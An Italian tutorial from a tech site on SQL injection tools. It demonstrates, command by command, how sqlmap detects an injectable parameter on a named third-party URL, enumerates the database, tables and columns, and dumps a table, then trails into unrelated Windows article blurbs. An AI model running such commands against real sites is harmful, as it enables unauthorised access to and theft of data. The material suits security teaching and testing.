In questa sezione LuckyTemplates ti presenterà alcuni strumenti utilizzati per sfruttare SQL Injection .
Attualmente esistono molti strumenti di scansione delle vulnerabilità della sicurezza (inclusa l'iniezione SQL). Questi strumenti consentono di rilevare e sfruttare in modo abbastanza efficace le vulnerabilità dell'SQL injection. Alcuni strumenti di sfruttamento delle vulnerabilità SQL injection automatici comunemente utilizzati includono:
Ci sono anche altri strumenti a cui puoi fare riferimento come: Netsparker, jSQL Injection, Burp, BBQSQL...
Di seguito è riportata una demo dell'utilizzo di Sqlmap per sfruttare l'SQL injection di base.
Puoi scaricare Sqlmap su http://sqlmap.org/
Sqlmap è scritto in Python, quindi per utilizzare questo strumento è necessario installare Python. Puoi scaricare Python da http://www.python.org/downloads/
Per prima cosa devi identificare il sito web di destinazione, qui ho il seguente target: http://zerocoolhf.altervista.org/level1.php?id=1 (questa pagina ora è morta).
Passaggio 1 : apri cmd e digita il seguente comando:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap rileverà la vulnerabilità della destinazione e fornirà informazioni sulla vulnerabilità.
Passaggio 2 : una volta stabilito che il sito Web di destinazione presenta una vulnerabilità SQL injection, procediamo alla ricerca del nome del database.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> Database: mio_zerocoolhf
Passaggio 3 : dopo aver determinato il nome del database, continueremo a trovare i nomi delle tabelle nel database.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> Ci sono 2 tabelle nel database: auth e book
Passaggio 4 : determinare i nomi delle colonne nella tabella
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> Individua le colonne nella tabella del libro: autore, id, prezzo, titolo.
Passaggio 5 : scarica i dati dalla tabella.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> Quindi abbiamo ottenuto il database del sito web di destinazione.
Sopra è riportata una demo di base dell'utilizzo di sqlmap per sfruttare gli errori di SQL injection. Puoi saperne di più sulle opzioni sqlmap su https://github.com/sqlmapproject/sqlmap/wiki/Usage per supportare lo sfruttamento. SQL injection exploit.
Desktop e server sono la stessa cosa? Se un normale computer è diverso da un server, qual è questa differenza? Come distinguere desktop e server? Quantrimang.com ha raccolto alcune idee principali per identificare desktop e server.
Ora puoi utilizzare OpenSSH su Windows 10 per connetterti a server remoti utilizzando SSH senza installare strumenti di terze parti. Questo articolo ti mostrerà come installare il client OpenSSH su Windows 10.
Unisciti a LuckyTemplates per scoprire come verificare che la funzione Sets sia abilitata sulla build di Windows 10 Insider Preview in questo articolo!
Molti fan di Windows Phone hanno aggiornato i loro telefoni a Windows 10 Mobiles. Tuttavia, dopo un periodo di utilizzo, molti utenti hanno scoperto che questa piattaforma presentava ancora molti errori e hanno voluto tornare a Windows Phone 8.1 come prima.
Se non lo sai, l'applicazione di mappatura integrata in Windows è basata su Microsoft Bing Maps e viene utilizzata per fare riferimento rapidamente alle indicazioni stradali per una posizione specifica quando necessario.
Se non desideri che altri utenti accedano ad alcune o a tutte le tue unità, puoi utilizzare gli oggetti Criteri di gruppo per limitare rapidamente l'accesso. Ecco i passaggi per impedire agli utenti di accedere alle unità in Windows.
Always On VPN è progettato per utilizzare piattaforme di gestione dei dispositivi mobili (MDM) come Microsoft Intune. Utilizzando Intune, gli amministratori possono creare e distribuire profili VPN distribuiti su qualsiasi dispositivo Windows 10, ovunque.
I nuovi computer Windows 8 non utilizzano il BIOS tradizionale ma utilizzano invece il firmware UEFI come i Mac anni fa. Il modo in cui è possibile eseguire attività comuni di sistema è cambiato.
Recentemente ho riscontrato uno strano problema: la mia unità USB da 4 GB si è improvvisamente trasformata in un'unità USB da 100 MB. Ho perso gran parte del mio spazio di archiviazione. Fortunatamente ho trovato un modo per risolverli, se hai una situazione simile, stai certo che la correzione di questo errore è sorprendentemente semplice.
Un modo semplice per confermare che c'è un problema è testare la velocità del Wi-Fi. Questo è molto facile da fare. Esistono molti servizi di test della velocità Wi-Fi online eseguiti all'interno del browser.
